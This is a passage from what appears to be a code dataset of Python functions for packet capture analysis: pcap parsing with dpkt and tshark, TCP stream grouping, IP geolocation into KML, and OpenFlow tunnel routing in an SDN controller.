match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. 
Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + 
str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)", "def process(self):\n fp = open(self.pcap, \"rb\")\n pkts = dpkt.pcap.Reader(fp)\n if self.sip and self.dip and self.sp and self.dp:\n self.process_pkts(pkts)", "def filter(self):\n # outfile = open(self.newpcap, 'wb')\n # writer = dpkt.pcap.Writer(outfile)\n f = open(self.pcapfile, 'rb')\n packets = dpkt.pcap.Reader(f)\n\n for timestamp, buf in packets:\n eth = dpkt.ethernet.Ethernet(buf)\n if not isinstance(eth.data, dpkt.ip.IP): # 确保以太网数据包含一个IP数据包, Non IP Packet type not supported\n continue # 过滤空IP包\n ip = eth.data # 获取以太网帧(IP数据包)\n if not isinstance(ip.data, dpkt.tcp.TCP): # 在传输层中检查TCP\n continue\n tcp = ip.data # 获取tcp数据\n # print('-->TCP Data: ', repr(tcp))\n\n \"\"\" 过滤三次握手后的首包\"\"\"\n seq = self.seq_pattern.findall(repr(tcp))\n ack = self.ack_pattern.findall(repr(tcp))\n if not (seq or ack): # seq、ack必须有一个, 一真即真\n continue\n if ack:\n ack = ack[0]\n if seq:\n seq = seq[0]\n\n if not ack and seq: # 一次握手请求\n self.hash_table[seq] = {}\n self.stream_table[seq] = [buf]\n if ack and seq: # 二次、三次、交流包\n if str(int(ack) - 1) in self.hash_table.keys(): # 有一次握手记录\n number = str(int(ack) - 1)\n if 'second' not in self.hash_table[number].keys(): # 新增二次握手\n self.hash_table[number]['second'] = {'seq': seq, 'ack': ack}\n self.stream_table[number].append(buf) # 将二次握手添加到buf\n self.resp_relation[seq] = ack # 新增关系表\n\n # 存在二次握手记录, 看hash表有无第三次握手记录, 有就保存stream流\n # 基本就是traffic响应包了\n elif 'three' in self.hash_table[number].keys():\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n 
self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n\n # ack-1没有对应的hash表, 可能是三次握手或traffic请求包\n elif str(int(seq) - 1) in self.hash_table.keys():\n number = str(int(seq) - 1)\n if 'second' not in self.hash_table[number]:\n pass\n elif 'three' not in self.hash_table[number]: # 三次包\n self.hash_table[number]['three'] = {'seq': seq, 'ack': ack}\n self.stream_table[number].append(buf)\n # 否则就是traffic包了\n else:\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n # traffic响应包\n elif str(int(seq) - 1) in self.resp_relation.keys():\n number = str(int(seq) - 1)\n second_ack = self.resp_relation[number]\n number = str(int(second_ack) - 1)\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n else:\n continue # seq不存在\n\n # outfile.close()\n f.close()", "def get_connections(capture):\n ip_dict = dict()\n for pkt in capture:\n\n if not hasattr(pkt, \"ip\") and not hasattr(pkt, \"ipv6\"):\n continue\n\n protocol = pkt.highest_layer\n\n tcp_dst_port = None\n tcp_src_port = None\n if hasattr(pkt, \"tcp\"):\n tcp_src_port = pkt.tcp.srcport\n tcp_dst_port = pkt.tcp.dstport\n\n if hasattr(pkt, \"ip\"):\n if pkt.ip.src.startswith(\"192.168.178\"):\n ip, dst = pkt.ip.src, pkt.ip.dst\n else:\n ip, dst = pkt.ip.dst, pkt.ip.src\n tcp_dst_port = tcp_src_port\n else:\n # TODO: how to discern src and dst in IPv6?\n ip, dst = pkt.ipv6.src, pkt.ipv6.dst\n\n ip = \"%s\" % ip\n dkey = (\n \"%s\" % protocol,\n int(tcp_dst_port) if tcp_dst_port else None,\n \"%s\" % dst\n )\n if ip not in ip_dict:\n ip_dict[ip] = {dkey: 1}\n else:\n ip_dict[ip][dkey] = ip_dict[ip].get(dkey, 0) + 1\n return ip_dict", "def process_pcap(self):\n fp = open(self.pcap, \"rb\")\n pkts = dpkt.pcap.Reader(fp)\n self.process_pkts(pkts)", "def handle_tcp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n sequence_num = int(pkt[start_point:start_point+8], 16)\r\n start_point += 8\r\n acknowledgment = int(pkt[start_point:start_point+8], 16)\r\n start_point += 8\r\n data_offset = int(pkt[start_point], 16) * 4\r\n start_point += 2\r\n flags = pkt[start_point:start_point+2]\r\n flags_str = \"\"\r\n for f in flags:\r\n flags_str += str(format(int(f), '04b'))\r\n start_point += 2\r\n window_size = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n start_point += 4\r\n urgent_pointer = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n options = int((2 * packets[i][0][0] - start_point)/2)\r\n\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(sequence_num)\r\n packets[i][2].append(acknowledgment)\r\n packets[i][2].append(data_offset)\r\n packets[i][2].append(flags_str)\r\n packets[i][2].append(window_size)\r\n packets[i][2].append(checksum_value)\r\n packets[i][2].append(urgent_pointer)\r\n packets[i][2].append(options)\r\n return packets", "def reader(self):\n while self.alive:\n try:\n data = self.serial.read_until(b'~')[:-1]\n packet = ethernet.Ethernet(data)\n if packet[icmp.ICMP]:\n packet[ethernet.Ethernet].dst_s = \"dc:a6:32:00:a7:8b\"\n packet[ip.IP].dst_s = \"192.168.1.35\"\n packet[icmp.ICMP].sum = b'0x1783'\n 
print(\"\\n\\n__________________RESPONSE FROM VISIBLE PI__________________\")\n print(packet)\n if data:\n self.write(packet.bin())\n except socket.error as msg:\n break\n self.alive = False", "def udp_iterator(pc):\n\tfor time,pkt in pc:\n\t\teth = dpkt.ethernet.Ethernet(pkt)\n\t\tif eth.type == dpkt.ethernet.ETH_TYPE_IP:\n\t\t ip = eth.data\n\t\t # if the IP protocol is UDP, process it further\n\t\t if ip.p == dpkt.ip.IP_PROTO_UDP :\n\t\t\tudp = ip.data\n\t\t\tyield( ip.src, udp.sport, ip.dst, udp.dport, udp.data )", "def read_and_store_pcap(file_name):\r\n file = open(file_name, \"rb\")\r\n global_header = file.read(24).hex()\r\n byte = file.read(16)\r\n packets = []\r\n bytes = []\r\n sizes = []\r\n while byte:\r\n packet_header = byte.hex()\r\n # parse the size for each packet\r\n size = struct.unpack(\"<L\", codecs.decode(str(packet_header[16:24]), \"hex\"))[0]\r\n sizes.append(size)\r\n # read the whole packet by its size from the bytes\r\n byte = file.read(size).hex()\r\n bytes.append(byte)\r\n byte = file.read(16)\r\n for size in sizes:\r\n packets.append(([size], [], []))\r\n i = 0\r\n\r\n for pkt in bytes:\r\n packets = handle_pkt_header(pkt, packets, i)\r\n packets, start_point = handle_ip_header(pkt, packets, i)\r\n protocol = packets[i][1][7]\r\n if protocol == 1:\r\n packets = handle_icmp(pkt, packets, i, start_point)\r\n elif protocol == 6:\r\n packets = handle_tcp(pkt, packets, i, start_point)\r\n elif protocol == 17:\r\n packets = handle_udp(pkt, packets, i, start_point)\r\n i += 1\r\n # print(packets)\r\n return packets", "def testParse(self):\n parser = pcap.PcapParser()\n storage_writer = self._ParseFile(['test.pcap'], parser)\n\n # PCAP information:\n # Number of streams: 96 (TCP: 47, UDP: 39, ICMP: 0, Other: 10)\n #\n # For each stream 2 events are generated one for the start\n # and one for the end time.\n\n self.assertEqual(storage_writer.number_of_events, 192)\n\n events = list(storage_writer.GetEvents())\n\n # Test stream 3 (event 6).\n # Protocol: TCP\n # Source IP: 192.168.195.130\n # Dest IP: 63.245.217.43\n # Source Port: 1038\n # Dest Port: 443\n # Stream Type: SSL\n # Starting Packet: 4\n # Ending Packet: 6\n\n event = events[6]\n self.assertEqual(event.packet_count, 3)\n self.assertEqual(event.protocol, 'TCP')\n self.assertEqual(event.source_ip, '192.168.195.130')\n self.assertEqual(event.dest_ip, '63.245.217.43')\n self.assertEqual(event.dest_port, 443)\n self.assertEqual(event.source_port, 1038)\n self.assertEqual(event.stream_type, 'SSL')\n self.assertEqual(event.first_packet_id, 4)\n self.assertEqual(event.last_packet_id, 6)\n\n # Test stream 6 (event 12).\n # Protocol: UDP\n # Source IP: 192.168.195.130\n # Dest IP: 192.168.195.2\n # Source Port: 55679\n # Dest Port: 53\n # Stream Type: DNS\n # Starting Packet: 4\n # Ending Packet: 6\n # Protocol Data: DNS Query for wpad.localdomain\n\n event = events[12]\n self.assertEqual(event.packet_count, 5)\n self.assertEqual(event.protocol, 'UDP')\n self.assertEqual(event.source_ip, '192.168.195.130')\n self.assertEqual(event.dest_ip, '192.168.195.2')\n self.assertEqual(event.dest_port, 53)\n self.assertEqual(event.source_port, 55679)\n self.assertEqual(event.stream_type, 'DNS')\n self.assertEqual(event.first_packet_id, 11)\n self.assertEqual(event.last_packet_id, 1307)\n self.assertEqual(\n event.protocol_data, 'DNS Query for wpad.localdomain')\n\n expected_message = (\n 'Source IP: 192.168.195.130 '\n 'Destination IP: 192.168.195.2 '\n 'Source Port: 55679 '\n 'Destination Port: 53 '\n 'Protocol: UDP '\n 
'Type: DNS '\n 'Size: 380 '\n 'Protocol Data: DNS Query for wpad.localdomain '\n 'Stream Data: \\'\\\\xb8\\\\x9c\\\\x01\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00'\n '\\\\x00\\\\x00\\\\x04wpad\\\\x0blocaldomain\\\\x00\\\\x00\\\\x01\\\\x00\\\\x01\\\\xb8'\n '\\\\x9c\\\\x01\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x04wpa\\' '\n 'First Packet ID: 11 '\n 'Last Packet ID: 1307 '\n 'Packet Count: 5')\n expected_short_message = (\n 'Type: DNS '\n 'First Packet ID: 11')\n\n self._TestGetMessageStrings(event, expected_message, expected_short_message)", "def convert_pcap_to_dataframe(input_file):\r\n if not os.path.exists(input_file):\r\n raise IOError(\"File \" + input_file + \" does not exist\")\r\n\r\n tshark_fields = \"-e frame.time_epoch \" \\\r\n \"-e _ws.col.Source \" \\\r\n \"-e _ws.col.Destination \" \\\r\n \"-e _ws.col.Protocol \" \\\r\n \"-e frame.len \" \\\r\n \"-e ip.ttl \" \\\r\n \"-e ip.flags.mf \" \\\r\n \"-e ip.frag_offset \" \\\r\n \"-e icmp.type \" \\\r\n \"-e tcp.srcport \" \\\r\n \"-e tcp.dstport \" \\\r\n \"-e udp.srcport \" \\\r\n \"-e udp.dstport \" \\\r\n \"-e dns.qry.name \" \\\r\n \"-e dns.qry.type \" \\\r\n \"-e http.request \" \\\r\n \"-e http.response \" \\\r\n \"-e http.user_agent \" \\\r\n \"-e tcp.flags.str \" \\\r\n \"-e ntp.priv.reqcode \"\r\n\r\n temporary_file = tempfile.TemporaryFile(\"r+b\")\r\n\r\n # print(shutil.which(command))\r\n\r\n p = subprocess.Popen([settings.TSHARK + \" -n -r \\\"\" + input_file + \"\\\" -E separator='\\x03' -E header=y -T fields \" + tshark_fields],\r\n shell=True, stdout=temporary_file) #\\x03 is ETX\r\n p.communicate()\r\n p.wait()\r\n\r\n # Reset file pointer to start of file\r\n temporary_file.seek(0)\r\n\r\n df = pd.read_csv(temporary_file, sep=\"\\x03\", low_memory=False, error_bad_lines=False)\r\n\r\n temporary_file.close()\r\n\r\n if ('tcp.srcport' in df.columns) and ('udp.srcport' in df.columns) and ('tcp.dstport' in df.columns) and \\\r\n ('udp.dstport' in df.columns):\r\n # Combine source and destination ports from tcp and udp\r\n df['srcport'] = df['tcp.srcport'].fillna(df['udp.srcport'])\r\n df['dstport'] = df['tcp.dstport'].fillna(df['udp.dstport'])\r\n\r\n df['srcport'] = df['srcport'].apply(lambda x: int(x) if str(x).replace('.', '', 1).isdigit() else 0)\r\n df['dstport'] = df['dstport'].apply(lambda x: int(x) if str(x).replace('.', '', 1).isdigit() else 0)\r\n\r\n # Remove columns: 'tcp.srcport', 'udp.srcport','tcp.dstport', 'udp.dstport'\r\n df.drop(['tcp.srcport', 'udp.srcport', 'tcp.dstport', 'udp.dstport'], axis=1, inplace=True)\r\n\r\n # Drop all empty columns (for making the analysis more efficient! 
less memory.)\r\n df.dropna(axis=1, how='all', inplace=True)\r\n df = df.fillna(0)\r\n\r\n if 'icmp.type' in df.columns:\r\n df['icmp.type'] = df['icmp.type'].astype(str)\r\n\r\n if 'ip.frag_offset' in df.columns:\r\n df['ip.frag_offset'] = df['ip.frag_offset'].astype(str)\r\n\r\n if 'ip.flags.mf' in df.columns:\r\n df['ip.flags.mf'] = df['ip.flags.mf'].astype(str)\r\n\r\n if ('ip.flags.mf' in df.columns) and ('ip.frag_offset' in df.columns):\r\n # Analyse fragmented packets\r\n df['fragmentation'] = (df['ip.flags.mf'] == '1') | (df['ip.frag_offset'] != '0')\r\n df.drop(['ip.flags.mf', 'ip.frag_offset'], axis=1, inplace=True)\r\n\r\n if 'tcp.flags.str' in df.columns:\r\n df['tcp.flags.str'] = df['tcp.flags.str'].str.encode(\"utf-8\") \r\n\r\n return df", "def print_info(self):\n \n i = 1\n for pcap_packet in self.pcap_packets:\n print '----------------frame: %d------------' % i\n i += 1\n pcap_packet.ethernet.print_info()\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n print '################# packet in the frame ################'\n pcap_packet.ip.print_info()\n \n #skp the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n print '@@@@@@@@@@@@@@@@@@@ tcp fields @@@@@@@@@@@@@@@@@@@@'\n pcap_packet.tcp.print_info()\n \n print\n #endof for", "def print_info(self):\n \n i = 1\n for pcap_packet in self.pcap_packets:\n print '----------------frame: %d------------' % i\n i += 1\n pcap_packet.ethernet.print_info()\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n print '################# packet in the frame ################'\n pcap_packet.ip.print_info()\n \n #skp the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n print '@@@@@@@@@@@@@@@@@@@ tcp fields @@@@@@@@@@@@@@@@@@@@'\n pcap_packet.tcp.print_info()\n \n print\n #endof for", "def _read_packets(self, reader: Par2FileReader):\n start_count = len(self)\n pointers = reader.get_pointers()\n # Create RecoverySets if needed\n for set_id, pointer_set in packets.by_set_id(pointers).items():\n print(set_id.hex(), pointer_set)\n if set_id not in self.recovery_sets.keys():\n # Create a RecoverySet if needed\n self.recovery_sets[set_id] = RecoverySet(set_id)\n for pointer in pointer_set:\n self.recovery_sets[set_id].packets.add(pointer)\n logger.info(\"Added {} new packets\".format(len(self) - start_count))", "def locator(pcap_obj,kml_file):\r\n ip_list = []\r\n for ts, buf in pcap_obj:\r\n eth = dpkt.ethernet.Ethernet(buf)\r\n ip = eth.data\r\n try: # extract all unique IPs\r\n src_ip = str(socket.inet_ntoa(ip.src))\r\n dst_ip = str(socket.inet_ntoa(ip.dst))\r\n if src_ip in ip_list:\r\n pass\r\n else:\r\n ip_list.append(src_ip)\r\n if dst_ip in ip_list:\r\n pass\r\n else:\r\n ip_list.append(dst_ip)\r\n except AttributeError:\r\n pass\r\n\r\n try:\r\n reader = geoip2.database.Reader('GeoLite2-City_20190129.mmdb') # reading from db(can be redacted)\r\n except FileNotFoundError:\r\n print(f'[!]DB file not in current directory or with a different file name')\r\n sys.exit(1)\r\n area = []\r\n longitude = []\r\n latitude = []\r\n ips = []\r\n for ip_addr in ip_list:\r\n try:\r\n rec = reader.city(ip_addr) # reading IP\r\n country = rec.country.iso_code # assigning country and city\r\n city = rec.city.name\r\n if city is None and country is None:\r\n area.append('Unknown')\r\n elif city is None:\r\n area.append(f'Unknown city:{country}') # looking for unknown country\r\n elif 
country is None:\r\n area.append(f'Unknown country:{city}') # looking for unknown city\r\n else:\r\n area.append(f'{city} {country}')\r\n\r\n longitude.append(rec.location.longitude)\r\n latitude.append(rec.location.latitude)\r\n ips.append(ip_addr)\r\n except geoip2.errors.AddressNotFoundError:\r\n pass\r\n\r\n try:\r\n kml = simplekml.Kml()\r\n final_path = str(os.getcwd() + os.sep + kml_file) # defining full canonical path\r\n for i in range(0, len(ips)):\r\n kml.newpoint(name=(area[i]),\r\n coords=[(longitude[i], latitude[i])],\r\n description=f'[+] Location = {area[i]}\\n IP: {ips[i]}')\r\n kml.save(final_path)\r\n print(f\"[+] Writing IP locations to {kml_file}\") # writing data to a KML file\r\n print(f\"[+] Opening Google Earth with:{kml_file}\\n\") # reading file with google earth\r\n try:\r\n os.startfile(final_path)\r\n except OSError:\r\n print(f'[!] Warning: Google Earth must be installed to open the kml')\r\n except FileNotFoundError:\r\n pass", "def capture_packets(self, interface, count=1, timeout=None):\n if interface not in self.packet_captures:\n raise ObjectNotFoundException(\n 'No packet capture is running or was run on host/interface' +\n self.name + '/' + interface)\n tcpd = self.packet_captures[interface]\n return tcpd.wait_for_packets(count, timeout)", "def process_pkts(self, pkts: list):\n pkt_count = 0\n for ts, buf in pkts:\n eth = dpkt.ethernet.Ethernet(buf)\n if not isinstance(eth.data, dpkt.ip.IP):\n continue\n ip = eth.data\n if ((inet_to_str(ip.src) == self.sip and inet_to_str(ip.dst) == self.dip) or\n (inet_to_str(ip.src) == self.dip and inet_to_str(ip.dst) == self.sip)):\n if isinstance(ip.data, dpkt.tcp.TCP):\n tcp = ip.data\n if ((tcp.sport == self.sp and tcp.dport == self.dp) or\n (tcp.dport == self.sp and tcp.sport == self.dp)):\n pkt_count += 1\n self._process(buf, ts, pkt_count)\n if self._c_state == self._s_state and self._c_state == TCPState.CLOSED:\n logger.info(\"Session finished.\")\n logger.info(\"Number of packets in the session id: {} is {}\".format(\n self.session_count, len(self.sessions[self.session_count])))\n self.__reset_state__()", "def extract_from_pcap(device=None, pcap=None, flags=\"-v -r\", path_to_chaosreader=\"/tmp/\"):\n if device is None or pcap is None:\n raise Exception(\"device and pcap are mandatory arguments\")\n device.shell(command=\"cd /tmp\")\n\n cmd = path_to_chaosreader + \"chaosreader0.94 \" + flags + \" \" + pcap\n output = device.shell(command=cmd)\n\n if not re.match(\".*Creating files.*\", output.response(), re.DOTALL):\n device.log(level=\"ERROR\", message=\"Chaosreader ran into an error\")\n raise Exception(\"Chaosreader ran into an error\")\n\n return True", "def handle_icmp(pkt, packets, i, start_point):\r\n icmp_type = int(pkt[start_point:start_point+2], 16)\r\n start_point = start_point + 2\r\n icmp_code = int(pkt[start_point:start_point+2], 16)\r\n start_point = start_point + 2\r\n icmp_checksum = pkt[start_point:start_point+4]\r\n packets[i][2].append(icmp_type)\r\n packets[i][2].append(icmp_code)\r\n packets[i][2].append(icmp_checksum)\r\n return packets", "def get_total_and_retrans_frames(pcap_filepath, connections):\n # First init values to avoid strange errors if connection is empty\n for conn_id, conn in connections.iteritems():\n for direction in co.DIRECTIONS:\n connections[conn_id].flow.attr[direction][co.FRAMES_TOTAL] = 0\n connections[conn_id].flow.attr[direction][co.BYTES_FRAMES_TOTAL] = 0\n connections[conn_id].flow.attr[direction][co.FRAMES_RETRANS] = 0\n 
connections[conn_id].flow.attr[direction][co.BYTES_FRAMES_RETRANS] = 0\n\n stats_filename = os.path.basename(pcap_filepath)[:-5] + \"_tshark_total\"\n stats_file = open(stats_filename, 'w')\n co.tshark_stats(None, pcap_filepath, print_out=stats_file)\n stats_file.close()\n\n stats_file = open(stats_filename)\n data = stats_file.readlines()\n stats_file.close()\n for line in data:\n split_line = \" \".join(line.split()).split(\" \")\n if len(split_line) == 11:\n # Manage case with ipv6\n ip_src, port_src = get_ip_port_tshark(split_line[0])\n ip_dst, port_dst = get_ip_port_tshark(split_line[2])\n for conn_id, conn in connections.iteritems():\n if conn.flow.attr[co.SADDR] == ip_src and conn.flow.attr[co.SPORT] == port_src and \\\n conn.flow.attr[co.DADDR] == ip_dst and conn.flow.attr[co.DPORT]:\n connections[conn_id].flow.attr[co.S2C][co.FRAMES_TOTAL] = int(split_line[3])\n connections[conn_id].flow.attr[co.S2C][co.BYTES_FRAMES_TOTAL] = int(split_line[4])\n connections[conn_id].flow.attr[co.C2S][co.FRAMES_TOTAL] = int(split_line[5])\n connections[conn_id].flow.attr[co.C2S][co.BYTES_FRAMES_TOTAL] = int(split_line[6])\n break\n\n stats_file.close()\n os.remove(stats_filename)\n\n stats_filename = os.path.basename(pcap_filepath)[:-5] + \"_tshark_retrans\"\n stats_file = open(stats_filename, 'w')\n co.tshark_stats('tcp.analysis.retransmission', pcap_filepath, print_out=stats_file)\n stats_file.close()\n\n stats_file = open(stats_filename)\n data = stats_file.readlines()\n stats_file.close()\n for line in data:\n split_line = \" \".join(line.split()).split(\" \")\n if len(split_line) == 11:\n ip_src, port_src = get_ip_port_tshark(split_line[0])\n ip_dst, port_dst = get_ip_port_tshark(split_line[2])\n for conn_id, conn in connections.iteritems():\n if conn.flow.attr[co.SADDR] == ip_src and conn.flow.attr[co.SPORT] == port_src and \\\n conn.flow.attr[co.DADDR] == ip_dst and conn.flow.attr[co.DPORT]:\n connections[conn_id].flow.attr[co.S2C][co.FRAMES_RETRANS] = int(split_line[3])\n connections[conn_id].flow.attr[co.S2C][co.BYTES_FRAMES_RETRANS] = int(split_line[4])\n connections[conn_id].flow.attr[co.C2S][co.FRAMES_RETRANS] = int(split_line[5])\n connections[conn_id].flow.attr[co.C2S][co.BYTES_FRAMES_RETRANS] = int(split_line[6])\n break\n\n stats_file.close()\n os.remove(stats_filename)", "def next_connection_packets(piter, linktype=1):\n first_ft = None\n\n for ts, raw in piter:\n ft = flowtuple_from_raw(raw, linktype)\n if not first_ft: first_ft = ft\n\n sip, dip, sport, dport, proto = ft\n if not (first_ft == ft or first_ft == (dip, sip, dport, sport, proto)):\n break\n\n yield {\n \"src\": sip, \"dst\": dip, \"sport\": sport, \"dport\": dport, \"proto\": proto,\n \"raw\": payload_from_raw(raw, linktype).encode(\"base64\"), \"direction\": first_ft == ft,\n }", "def get_pcap_traffic_series(self):\n parsed_pcap_data = {}\n\n if (self.mac_address_binary is not None):\n parsed_pcap_data[self.mac_address_binary] = []\n\n with open(self.pcap_file_path, 'rb') as pcap_file:\n try:\n pcap = dpkt.pcap.Reader(pcap_file)\n for ts, buf in pcap:\n # Skip non ethernet frames\n try:\n eth = dpkt.ethernet.Ethernet(buf)\n except:\n continue\n\n # Skip non-IP packets\n if eth.type != 2048:\n continue\n \n # Apply eth filter\n if (self.mac_address_binary is not None):\n self.append_data(parsed_pcap_data, self.mac_address_binary, eth, ts)\n else:\n if (eth.src not in parsed_pcap_data):\n parsed_pcap_data[eth.src] = []\n if (eth.dst not in parsed_pcap_data):\n parsed_pcap_data[eth.dst] = []\n\n 
